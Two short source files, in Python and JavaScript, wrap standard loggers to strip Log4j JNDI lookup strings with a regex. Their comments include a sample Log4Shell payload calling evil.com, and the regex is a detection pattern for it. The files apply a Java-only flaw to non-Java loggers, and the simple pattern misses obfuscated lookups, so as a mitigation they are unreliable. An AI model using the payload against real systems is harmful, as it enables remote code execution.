File: fix_log4j.py
import re
import logging

class SafeLog4jLogger:
    """A custom logger that prevents JNDI injection by stripping JNDI lookup patterns."""
    
    JNDI_PATTERN = re.compile(r'\$\{jndi:[^}]+\}', re.IGNORECASE)
    
    def __init__(self, name):
        self.logger = logging.getLogger(name)
    
    def _sanitize(self, message):
        """Remove JNDI injection patterns from the message."""
        if isinstance(message, str):
            return self.JNDI_PATTERN.sub('[SANITIZED]', message)
        return message
    
    def debug(self, message, *args, **kwargs):
        self.logger.debug(self._sanitize(message), *args, **kwargs)
    
    def info(self, message, *args, **kwargs):
        self.logger.info(self._sanitize(message), *args, **kwargs)
    
    def warning(self, message, *args, **kwargs):
        self.logger.warning(self._sanitize(message), *args, **kwargs)
    
    def error(self, message, *args, **kwargs):
        self.logger.error(self._sanitize(message), *args, **kwargs)
    
    def critical(self, message, *args, **kwargs):
        self.logger.critical(self._sanitize(message), *args, **kwargs)

# Usage example:
# logger = SafeLog4jLogger('myapp')
# logger.info('User input: ${jndi:ldap://evil.com/a}')
# This will log: 'User input: [SANITIZED]'

File: fix_log4j.js
// A safe wrapper for console.log to prevent Log4j JNDI injection.
// For production, consider using a structured logging library.

const JNDI_REGEX = /\$\{jndi:[^}]+\}/gi;

function sanitizeMessage(msg) {
  if (typeof msg === 'string') {
    return msg.replace(JNDI_REGEX, '[SANITIZED]');
  }
  return msg;
}

const safeLogger = {
  log: function(...args) {
    const sanitized = args.map(arg => sanitizeMessage(arg));
    console.log(...sanitized);
  },
  info: function(...args) {
    const sanitized = args.map(arg => sanitizeMessage(arg));
    console.info(...sanitized);
  },
  warn: function(...args) {
    const sanitized = args.map(arg => sanitizeMessage(arg));
    console.warn(...sanitized);
  },
  error: function(...args) {
    const sanitized = args.map(arg => sanitizeMessage(arg));
    console.error(...sanitized);
  },
  debug: function(...args) {
    const sanitized = args.map(arg => sanitizeMessage(arg));
    console.debug(...sanitized);
  }
};

// Usage example:
// safeLogger.info('User input: ${jndi:ldap://evil.com/a}');
// Output: 'User input: [SANITIZED]'

module.exports = safeLogger;